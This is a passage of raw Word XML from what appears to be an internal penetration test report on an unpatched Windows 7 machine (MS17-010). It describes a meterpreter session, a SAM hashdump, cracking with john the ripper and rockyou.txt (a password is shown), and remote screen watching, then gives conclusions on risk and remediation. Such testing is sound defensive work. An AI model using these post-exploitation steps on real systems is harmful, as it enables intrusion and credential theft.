        <w:t>xploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792274EB" w14:textId="229C7B29" w:rsidR="006669DA" w:rsidRDefault="002B2ED5" w:rsidP="006669DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto" w:shadow="1"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto" w:shadow="1"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto" w:shadow="1"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto" w:shadow="1"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>--help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C6B71A" w14:textId="27012AA4" w:rsidR="005C647A" w:rsidRPr="006669DA" w:rsidRDefault="00DC3DEF" w:rsidP="002B2ED5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto" w:shadow="1"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto" w:shadow="1"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto" w:shadow="1"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto" w:shadow="1"/>
        </w:pBdr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74780D76" wp14:editId="0C4CDDB3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>119380</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>233045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3679190" cy="2964815"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="3691339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33932" name="Picture 3691339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9190" cy="2964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6C6541D" wp14:editId="4C0F917A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3839210</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>233045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3721100" cy="2985135"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="5965206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20608" name="Picture 5965206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1100" cy="2985135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="002B2ED5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t># Ultimately, a meterpreter session was opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B42D4E" w14:textId="4E150557" w:rsidR="00642D77" w:rsidRPr="007F4E0B" w:rsidRDefault="00642D77" w:rsidP="00840D82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68718056" w14:textId="16455011" w:rsidR="00DC3DEF" w:rsidRPr="00DC3DEF" w:rsidRDefault="00DC3DEF" w:rsidP="00DC3DEF">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C1D4C93" wp14:editId="7ADEAFEA">
            <wp:extent cx="5402580" cy="2887980"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1973367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67500" name="Picture 19733675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580" cy="2887980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46783618" w14:textId="2CA59C7F" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conducted post-exploitation activities, such as </w:t>
      </w:r>
      <w:r w:rsidR="00642D77" w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">screenshare </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and data extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41D164" w14:textId="5853F845" w:rsidR="00840D82" w:rsidRPr="00840D82" w:rsidRDefault="00840D82" w:rsidP="00840D82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00840D82">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>hashdump #dumps the content of SAM Data base in hash format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0ACAF5" w14:textId="77777777" w:rsidR="00840D82" w:rsidRPr="00840D82" w:rsidRDefault="00840D82" w:rsidP="00840D82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00840D82">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Used echo to save the hash password in has7.txt and then cracked the hash with john the ripper, using rockyou.txt as the wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B190CD9" w14:textId="77777777" w:rsidR="00840D82" w:rsidRPr="00840D82" w:rsidRDefault="00840D82" w:rsidP="00840D82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00840D82">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT has7.txt #(SAM database is encrypted with NTLM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA2F1B" w14:textId="0858B81E" w:rsidR="00840D82" w:rsidRPr="00840D82" w:rsidRDefault="00840D82" w:rsidP="00840D82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00840D82">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t># password-alqfna22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4304067D" w14:textId="2D8F1645" w:rsidR="00840D82" w:rsidRPr="00840D82" w:rsidRDefault="00DC3DEF" w:rsidP="00840D82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:num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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29A1668F" wp14:editId="7BF18094">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>444500</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>474345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5333365" cy="3002280"/>
            <wp:effectExtent l="0" t="0" r="635" b="7620"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1948970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0280" name="Picture 19489702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3365" cy="3002280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00840D82" w:rsidRPr="00840D82">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t># successfully carried out screen share to watch the remote user desktop in real time using msf console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A2F5F4" w14:textId="6DC48C8F" w:rsidR="00840D82" w:rsidRPr="005C647A" w:rsidRDefault="00840D82" w:rsidP="00840D82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F3DC705" w14:textId="1F98F951" w:rsidR="00DC3DEF" w:rsidRPr="00DC3DEF" w:rsidRDefault="00DC3DEF" w:rsidP="00840D82">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EB90481" wp14:editId="50E1A7DC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2987040</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5539105" cy="2890520"/>
            <wp:effectExtent l="0" t="0" r="4445" b="5080"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="15358176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17682" name="Picture 15358176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9105" cy="2890520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D3055D2" wp14:editId="661F1125">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5539105" cy="2933700"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="3969349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34941" name="Picture 3969349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39105" cy="2933700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="615D2275" w14:textId="28513A7E" w:rsidR="00840D82" w:rsidRPr="00DC3DEF" w:rsidRDefault="00840D82" w:rsidP="00233899">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc175499467"/>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t>3.3 Results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="73378A2C" w14:textId="21AA8FA1" w:rsidR="00840D82" w:rsidRPr="00840D82" w:rsidRDefault="00840D82" w:rsidP="00840D82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00840D82">
        <w:t xml:space="preserve">The Windows 7 machine was successfully </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">compromised with the password </w:t>
      </w:r>
      <w:r w:rsidRPr="00840D82">
        <w:t>alqfna22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F457D66" w14:textId="258AADC1" w:rsidR="00840D82" w:rsidRPr="00DC3DEF" w:rsidRDefault="00DC3DEF" w:rsidP="00840D82">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54389523" wp14:editId="60A89FFC">
            <wp:extent cx="5539105" cy="2948305"/>
            <wp:effectExtent l="0" t="0" r="4445" b="4445"/>
            <wp:docPr id="13120479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7911" name="Picture 13120479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9105" cy="2948305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="700E28D8" w14:textId="77777777" w:rsidR="00840D82" w:rsidRPr="00DC3DEF" w:rsidRDefault="00840D82" w:rsidP="00840D82">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC00339" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="00000000" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="03442D92">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6D175F" w14:textId="77777777" w:rsidR="00DC3DEF" w:rsidRPr="00DC3DEF" w:rsidRDefault="00DC3DEF" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A94396F" w14:textId="77777777" w:rsidR="00DC3DEF" w:rsidRPr="00DC3DEF" w:rsidRDefault="00DC3DEF" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D4866A4" w14:textId="232697A4" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="00162FB3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc175499468"/>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t>4. External Phase</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1D967F9E" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The external phase was not within the scope of this test as the focus was on internal network penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28676DE7" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="00000000" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="6994DD8E">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EFEE4B" w14:textId="05FCA583" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="00162FB3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc175499469"/>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00885809" w:rsidRPr="00DC3DEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t>Conclusions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="69956FA3" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Windows 7 Professional machine was found to be highly vulnerable due to the presence of the unpatched MS17-010 vulnerability. This vulnerability represents a significant risk, allowing attackers to gain full control over the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E8A97E" w14:textId="6B4EBDFD" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00885809" w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Most Likely Compromise Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBB021F" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remote attackers exploiting the MS17-010 vulnerability to gain unauthorized access and escalate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4D0D57" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lateral movement within the network, leading to a broader compromise of other connected systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1005B7A6" w14:textId="7117AC4F" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00885809" w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4663044A" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The exploitation of this vulnerability could lead to data breaches, service disruption, and further attacks on other networked systems. Immediate remediation is critical to mitigate the risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA8726F" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="00000000" w:rsidP="007F4E0B">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="0F046E2D">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
